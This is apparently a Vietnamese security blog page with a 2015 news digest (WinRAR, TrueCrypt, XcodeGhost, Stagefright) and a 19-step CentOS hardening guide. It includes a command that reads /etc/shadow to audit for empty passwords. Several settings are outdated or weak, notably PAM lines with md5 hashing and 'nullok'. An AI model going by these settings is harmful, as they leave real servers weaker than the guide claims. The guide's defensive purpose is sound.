Trong tháng 9, một lỗ hổng nghiêm trọng được phát hiện trong phiên bản mới nhất của WinRAR, ảnh hưởng đến hàng triệu người dùng trên toàn thế giới. Đến thời điểm hiện tại, nhà sản xuất vẫn chưa đưa ra bản vá cho lỗ hổng này.

Bkav khuyến cáo người dùng hạn chế sử dụng WinRAR khi lỗ hổng chưa được vá; không mở tập tin không rõ nguồn gốc, nếu bắt buộc phải mở thì mở trong môi trường cách ly; sử dụng phần mềm diệt virus.

Phát hiện 2 lỗ hổng nghiêm trọng trên TrueCrypt

Điểm tin An ninh mạng tháng 9/2015

Đầu tháng 10, hai lỗ hổng leo thang đặc quyền đã bị phát hiện trên phần mềm TrueCrypt, cho phép cài mã độc trên máy nạn nhân, từ đó tìm ra khóa mã hóa của TrueCrypt và các dữ liệu nhạy cảm khác. Trong khi đó, từ năm ngoái dự án phần mềm này đã lắng xuống sau khi các nhà phát triển tuyên bố là TrueCrypt có một số lỗi không thể khắc phục. 

Bkav khuyến cáo người dùng lựa chọn các phần mềm miễn phí khác có cùng tính năng để thay thế TrueCrypt.

Apple gỡ ứng dụng trên App Store bị dính mã độc

Điểm tin An ninh mạng tháng 9/2015

Cuối tháng 9, malware có tên XcodeGhost đã lây nhiễm 39 ứng dụng trên App Store dành cho thị trường Trung Quốc, trong đó có nhiều app phổ biến như WeChat, CamCard và Didi Chuxing… Tuy mức độ nguy hiểm không nghiêm trọng nhưng lỗ hổng này cũng dấy lên mối nghi ngờ về mức độ an toàn của App Store. Apple cho biết hãng đã loại bỏ những ứng dụng này khỏi App Store.

Google ‘đóng băng’ Flash trên trình duyệt Chrome từ 1/9

Điểm tin An ninh mạng tháng 9/2015

Đầu tháng 9, Google tuyên bố kế hoạch ngừng sử dụng Adobe Flash trên trình duyệt Chrome. Đây là cách Google bảo vệ người dùng trước những nguy cơ đến từ các trình duyệt có cài đặt Flash khi có quá nhiều lỗ hổng tồn tại trên thành phần này.

1,4 tỷ người dùng Android đối mặt nguy cơ bị tấn công qua lỗ hổng Stagefright

Điểm tin An ninh mạng tháng 9/2015

Đầu tháng 10, con số thiết bị chạy Android có nguy cơ bị ảnh hưởng bởi lỗ hổng Stagefright đã tăng từ 950 triệu lên 1,4 tỷ. Tin tặc khai thác lỗ hổng Stagefright 2.0 có khả năng tấn công các thiết bị chạy Android 1.0 trở lên từ đó có thể truy cập dữ liệu, ảnh, camera, microphone… trên điện thoại. Google vừa phát hành bản vá cho lỗ hổng và cho biết chưa ghi nhận việc khai thác lỗ hổng này trên thực tế.

WhiteHat.vn

Thứ Ba, 27 tháng 10, 2015

Tăng cường bảo mật cơ bản cho hệ thống máy chủ Linux

Hệ điều hành Linux được biết đến là hệ điều hành có tính bảo mật cao tuy nhiên cần có thêm một số cấu hình nhằm tăng độ an toàn cho hệ thống. Dưới đây là một số lời khuyên hữu ích dành cho hệ thống của bạn:

1. Bảo vệ an toàn từ phần cứng (BIOS)

Khi khởi động hệ thống máy tính thành phần đầu tiên được chạy chính là BIOS. Để đảm bảo an toàn cho hệ thống, người quản trị nên tắt chế độ boot từ các thiết bị như ổ đĩa CD/DVD, các thiết bị ngoại vi, đĩa mềm.. trong cấu hình BIOS. Sau đó cần tạo mật khẩu cho BIOS và  GRUB nhằm hạn chế các truy cập trái phép từ chính hệ thống của bạn

2. Phân vùng ổ cứng

Một cách thức để đảm bảo an toàn dữ liệu trước rủi ro là nên phân vùng ổ cứng cho hệ thống của mình. Bằng cách tạo ra các phân vùng khác nhau, dữ liệu được chia nhỏ và nhóm lại. Khi có sự cố xảy ra tại một phân vùng nào đó, chỉ có những dữ liệu ở cùng phân vùng đó bị hỏng còn tại các phân vùng khác dữ liệu an toàn. Hệ thống của bạn cần có các phân vùng như sau và chắc chắn các ứng dụng của bên thứ 3 cần được cài đặt tại phân vùng /opt
  • /
  • /boot
  • /usr
  • /var
  • /home
  • /tmp
  • /opt

3. Hạn chế các dịch vụ không cần thiết

Một hệ thống máy tính khi cài đặt quá nhiều các gói không cần thiết, không những làm giảm hiệu năng của hệ thống khi tranh giành tài nguyên với các dịch vụ khác mà còn làm cho hệ thống xuất hiện các lỗ hổng từ chính các gói không cần thiết đó. Một cách giảm thiểu rủi ro là xoá hay tắt các dịch vụ khi không cần thiết. Ví dụ trên hệ điều hành CentOS bạn có thể thực hiện như sau:
  • Kiểm tra các dịch vụ trong hệ thống đang chạy ở mức độ 3
# /sbin/chkconfig –list | grep ‘3:on’
  • Khi tìm thấy các dịch vụ không cần thiết đang chạy bạn thực hiện lệnh sau để tắt dịch vụ này:
# chkconfig ten_dich_vu off
  • Và có thể xoá dịch vụ khỏi hệ thống của bạn sử dụng lệnh:
# yum -y remove ten_goi

4. Kiểm tra các cổng dịch vụ đang chờ kết nối

Cũng như khi hạn chế các dịch vụ không cần thiết, bạn cũng nên tối thiểu các cổng dịch vụ không cần thiết để tăng hiệu năng cũng như giảm thiểu các lỗ hổng trong hệ thống của bạn. Bạn có thể sử dụng câu lệnh ‘netstat’ để xem tất cả các cổng được mở và các chương trình sử dụng kết nối mạng. Khi kiểm tra và phát hiện các dịch vụ mạng không cần thiết bạn có thể sử dụng ‘chkconfig’ để tắt các dịch vụ đó.
Sử dụng lệnh sau để xem thông tin tất cả các cổng:
# netstat –tulpn

5. Đảm bảo an toàn dịch vụ SSH

Trở về trước, khi kết nối điều khiển máy chủ từ xa sử dụng các giao thức telnet  rlogin, đây là các giao thức kết nối không an toàn khi chỉ kết nối sử dụng bản rõ mà không được mã hoá khi gửi dữ liệu. Tuy nhiên hiện Secure Shell (SSH) là giao thức được sử dụng rộng rãi bởi nó sử dụng công nghệ mã hoá khi giao tiếp với máy chủ. Tuy nhiên để đảm bảo an toàn cần cấu hình cho dịch vụ này như sau :
  • Mở file cấu hình dịch vụ SSH và thay đổi một số cấu hình:
# vi /etc/ssh/sshd_config
  • Tìm tới dòng cấu hình cổng và thay đổi cổng mặc định từ cổng 22 sang cổng khác ví dụ chuyển sang cổng 22000
Port 22000
  • Không cho phép đăng nhập bằng tài khoản root:
PermitRootLogin no
  • Chỉ cho phép đăng nhập mởi một số người dùng:
AllowUsers tennguoidung
  • Sử dụng giao thức SSH phiên bản 2:
Protocol 2

6. Thường xuyên cập nhật các bản vá lỗi của nhà phát hành

Luôn luôn để hệ thống của bạn được cập nhật bản mới nhất và các bản vá bảo mật. Ví dụ trên hệ điều hành CentOS:
# yum updates
# yum check-update

7. Vô hiệu hoá các Cronjob

Cron là một tiện ích mà người dùng có thể cho phép hoặc không cho phép các tác vụ (tasks) tự động chạy nền trên hệ thống theo định kỳ bằng cách sử dụng các cron daemon. Nó được điều khiển bởi các file/etc/cron.allow và /etc/cron.deny. Để khoá người dùng sử dụng cron, thêm tên người dùng đó vàocron.deny ; cho phép người dùng sử dụng cron, thêm tên người dùng vào file cron.allow. Để vô hiệu hoá tất người dùng sử dụng cron, thêm từ khoá ‘ALL’ vào dòng cuối cùng của file cron.deny. Sử dụng câu lệnh:
# echo ALL >> /etc/cron.deny

8. Tắt chức năng tự động phát hiện các thiết bị cắm vào cổng USB

Các thiết bị USB trở nên rất nguy hiểm đối với hệ thống khi tin tặc có thể thêm chương trình chạy tự động vào thiết bị. Khi chúng được cắm vào hệ thống sẽ có khả năng đánh cắp dữ liệu. Vì vậy cần tắt các chức năng tự động phát hiện USB đảm bảo hệ thống thoát khỏi nguy cơ trên. Tạo tệp tin /etc/modprobe.d/no-usb và thêm dòng dưới đây:
install usb-storage /bin/true

9. Luôn luôn bật cơ chế SELinux

Security-Enhanced Linux (SELinux) là một cơ chế bảo mật điều khiển truy cập bắt buộc quy định trong nhân. Nhiều hệ thống vì ưu tiên hiệu năng hệ thống nên đã tắt cơ chế này. Vô hiệu hoá SELinux có nghĩa là tự loại bỏ cơ chế bảo mật của hệ thống. Vì vậy cần suy nghĩ khi lựa chọn hiện năng và mức độ bảo mật của hệ thông khi đưa vào hoạt động
SELinux cung cấp 3 chế độ cơ bản:
  • Enforcing: Đây là chế độ mặc định cho phép thực hiện tất cả các chính sách bảo mật trên hệ thống
  • Permissive : Ở chế độ này SELinux không thực thi các chính sách bảo mật mà nó cung cấp các cảnh báo về các hoạt động. Chế độ này rất hưu ích để hạn chế các vấn đề của SELinux
  • Disable : Tắt cơ chế SELinux
Để xem trạng thái hiện tại của cơ chế này sử dụng câu lệnh :
# sestatus
Nếu nó đang tắt cần bật bởi câu lệnh:
# setenforce enforcing
Trong hệ điều hành CentOS các cấu hình của SELinux được quản lý bởi file ‘/etc/selinux/config’

10. Loại bỏ giao diện KDE/GNOME

Khi hệ thống có mục đích sử dụng chính là hệ thống web (LAMP server) không cần sử dụng tới các giao diện X Window như KDE hay GNOME. Vì vậy nên tắt hoặc loại bỏ chúng để cải thiện an toàn cũng như hiệu năng của hệ thống. Một cách đơn giản tắt chúng là mở tệp tin ‘/etc/inittab’ và đặt chúng chạy ở mức độ 3. Xoá chúng khỏi hệ thống sử dụng câu lệnh”
# yum groupremove "X Window System"

11. Tắt giao thức Ipv6

Giao thức IPv6 là giao thực ưu việt để thay thế IPv4 khi giao thức đang dần cạn kiện IP, tuy nhiên hiện nay hầu hết các hệ thống đều sử dụng IPv4 nên giao thức IPv6 là không cần thiết và nên tắt giao thực này. Mở tập tin cấu hình mạng và thêm các dòng cấu hình sau để tắt.
Mở file:
# vi /etc/sysconfig/network
Thêm các dòng cấu hình:
NETWORKING_IPV6=no
IPV6INIT=no

12. Hạn chế người dùng sử dụng các mật khẩu cũ

Trong hệ thống sẽ là rất hữu ích nếu không cho phép các người dùng sử dụng các mật khẩu cũ giống nhau để hạn chế các nguy cơ mất an toàn cho hệ thống. Trong các hệ điều hành RHEL / CentOS / Fedora passwork cũ được lưu lại trong tệp tin “/etc/security/opasswd” và được quản lý bởi module PAM. Để cấu hình người dùng không được dùng một mật khẩu cũ quá 5 lần bạn làm theo hướng dẫn sau :
  • Mở tệp tin /etc/pam.d/system-auth
# vi /etc/pam.d/system-auth
  • Thêm dòng sau vào dòng có từ khoá “auth”
 auth        sufficient    pam_unix.so likeauth nullok
  • Sửa dòng có từ khoá “password” để không cho phép người dùng sử dụng lại mật khẩu quá 5 lần:
password   sufficient    pam_unix.so nullok use_authtok md5 shadow remember=5

13. Cấu hình sử dụng mật khẩu mạnh.

Có rất nhiều người thường sử dụng các mật khẩu yếu và các mật khẩu của họ thường bị các tin tặc dễ dàng lấy đi thông tin từ các phương thức tấn công băng các phương pháp tấn công từ điển hoặc tấn công dò quét mật khẩu. Vì vậy cần có một cơ chế ép các ngươi dùng sử dụng các mật khẩu mạnh. Để thực hiến điều này cần thêm cấu hình trong modun ‘pam_cracklib’ như sau:
  • Mở tập tin cấu hình
# vi /etc/pam.d/system-auth
  • Và thêm dòng có cấu hình yêu cầu các thông số độ dài tối thiểu của mật khẩu, sử dụng cả chữ in thường, chữ in hoa, chữ số, kí hiệu đặc biệt có trong mật khẩu như sau :
/lib/security/$ISA/pam_cracklib.so retry=3 minlen=8 lcredit=-1 ucredit=-2 dcredit=-2 ocredit=-1

14. Bật chế độ tường lửa

Sẽ là rất tốt khi bật chế độ tường lửa trong hệ thống, đảm bảo an toàn trước các truy cập trái phép đối với hệ thống. Hệ thống cần được thêm các luật trong iptables để lọc các gói tin đến, gói tin đi và gói tin chuyển tiếp tới hệ thống. Và có thể chỉ định rõ các địa chỉ đích, địa chỉ nguồn cho phép hoặc không cho phép sử dụng các cổng và giao thức được chỉ định.
Đề xem các luật có trong hệ thống sử dụng lệnh sau:
# iptables -L -n -v 

15. Kiểm tra các tài khoản không có mật khẩu

Trong hệ thốn mỗi tài khoản có mật khẩu rỗng có nghĩa là đã để lộ các phương thức xác thực trái phép mà tất cả mọi người có thể thực hiện, đó là một mối nguy hiểm lớn đối với hệ thống. Vì vậy cần chắc chắn rằng tất cả các tài khoản cần có mật khẩu mạnh và không ai khác được cho phép truy cập. Vì vây cần kiểm tra các tài khoản không có mật khẩu như câu lệnh dưới đây và cần xem xet khoá các tài khoản này lại.
# cat /etc/shadow | awk -F: '($2==""){print $1}'

16. Tập trung log của các máy chủ về máy chủ chuyên dụng

Di chuyển các log ghi lại hoạt động của hệ thống về các máy chủ chuyên dụng là cách để phòng ngừa các tin tặc thay đổi dữ liệu khi chúng có quyền tryu cập trái phép vào hệ thống. Vì vậy có thể chắc chắn hệ thống đang an toàn. Dưới đây là hông tin về các tập tin log mặc định và cách sử dụng của chúng.
  • /var/log/message– Ghi lại các hoạt động của toàn hệ thống
  • /var/log/auth.log– Log xác thực hệ thống
  • /var/log/kern.log– Log của nhân
  • /var/log/cron.log– Log các tiến trình được tự động chạy
  • /var/log/maillog– Log dịch vụ mail
  • /var/log/mysqld.log– Log dịch vụ hệ quản trị dữ liệu mysql
  • /var/log/utmpor /var/log/wtmp : Lịch sử đăng nhập
  • /var/log/yum.log: Log dịch vụ YUM

17. Sao lưu dữ liệu quan trọng

Trong một hệ thống sản xuất, thực sự cần thiết khi sao lưu và giữ các giữ liệu quan trọng một cách cẩn thận. Khi có rủi ro trong hệ thống có thể dễ dàng phục hồi bởi các dữ liệu đã được sao lưu.

18. Không cho phép thay đổi thư mục /boot

Nhân hệ thống và các tập tin liên quan được đặt ở thư mục /boot, nó được đặt mặc địch cho phép đọc và sửa. Cần thay đổi để chỉ cho phép đọc thư mục này là thực sự cần thiết để đảm bảo cho hệ thống được hoạt động ổn định. Để thực hiện điều này cần thực hiện theo các bước sau:
  • Mở tệp tin “/etc/fstab”:
# vi /etc/fstab
  • Và cần thêm dòng sau vào cuối của tệp tin:
LABEL=/boot     /boot     ext2     defaults,ro     1 2
Cần ghi lại điều này mà thay đổi quyền của thư mục khi cập nhật nhân trong tương lai.

19. Chặn các gói tin ICPM và các yêu cầu Broadcast

Nhiều tin tặc sử dụng các gói tin ICMP để xác định các địa chỉ IP và tấn công các máy chủ có IP này. Để ngăn chặn điều này cần ngăn chặn các gói tin theo cách thay đổi tập tin “/etc/sysctl.conf” để chặn ping hoặc các yêu cầu broadcast.
  • Chặn các gói tin ICMP:
net.ipv4.icmp_echo_ignore_all = 1
  • Chặn các yêu cầu broadcast:
net.ipv4.icmp_echo_ignore_broadcasts = 1
Để cập nhật các thay đổi cần chạy câu lệnh :
# sysctl –p
Trên đây là một số mẹo để cải thiện an toàn cho hệ thống Linux hãy kiểm tra và bổ sung để hệ thống trách gặp các rủi do đáng tiếc

Nguồn: SD.net